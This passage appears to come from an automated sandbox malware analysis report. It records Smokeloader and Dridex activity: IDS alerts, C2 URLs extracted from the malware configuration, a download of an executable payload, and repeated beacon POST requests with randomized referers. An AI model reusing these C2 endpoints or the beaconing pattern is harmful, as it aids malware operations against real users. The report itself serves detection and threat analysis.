      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49994 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50007 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50013 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50063 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50065 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50067 version: TLS 1.2
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327AFB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,10_2_00007FF7327AFB38
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,12_2_030F2B15
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,12_2_030F3ED9
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,12_2_030F1D4A
      Source: C:\Windows\explorer.exeCode function: 13_2_003C30A8 FindFirstFileW,FindNextFileW,FindClose,13_2_003C30A8
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49762 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49786 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50058 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50061 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50060 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50066 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50062 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50059 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50064 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50068 -> 211.171.233.129:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50057 -> 109.175.29.39:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49882 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49882 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49890 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49902 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49890 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49902 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49898 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49919 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49925 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49898 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49925 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49931 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49948 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49941 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49948 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49931 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49919 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49941 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49966 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49978 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49978 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49966 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50007 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50007 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49913 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49913 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50013 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50001 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50013 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50001 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49972 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49972 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50050 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50063 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50063 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50065 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49994 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49954 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50065 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49994 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49954 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49960 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49960 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49984 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49984 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50067 -> 23.145.40.168:443
      Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50067 -> 23.145.40.168:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: https://ninjahallnews.com/search.php
      Source: Malware configuration extractorURLs: https://fallhandbat.com/search.php
      Source: Joe Sandbox ViewIP Address: 211.171.233.129 211.171.233.129
      Source: Joe Sandbox ViewIP Address: 109.175.29.39 109.175.29.39
      Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
      Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
      Source: Joe Sandbox ViewASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
      Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.168:443 -> 192.168.2.4:49882
      Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://pdafocuyeqbl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://qwngamstehwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://wuojfsenfaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mxlgirixfokriwnb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://uefyjrrvgteesaeq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://nnyeswfjrdkwqexg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://opoqwbbwkupiok.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://lrhrxwfbfqiw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mjscupccgtmnwxhe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mygtgmevqgkpxy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jqllhnybwxcxea.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://pupdhamncbgqgk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://lhkhfhdvkorst.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vhdgrtytskult.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ujxngjrjlobur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://igxvqkyyvgmutmd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://pkuvdwenklvosy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mmqmkrfdtvmaos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://klmaxatwhce.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kouspbvvekjqvnkd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ninjahallnews.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://giugthslvfwuci.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://dcegxttxxlsj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mqhltxselyb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fopeiyjgdmtd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bwtyrvoeqafgvbf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xghchnsekruohq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sexbgcirilxygdjd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iahhcvfewaqau.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eqcqgpejtwdt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wecknsvepmdnww.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhtdcxedsrrbqyo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdkltibbufmpdfhy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
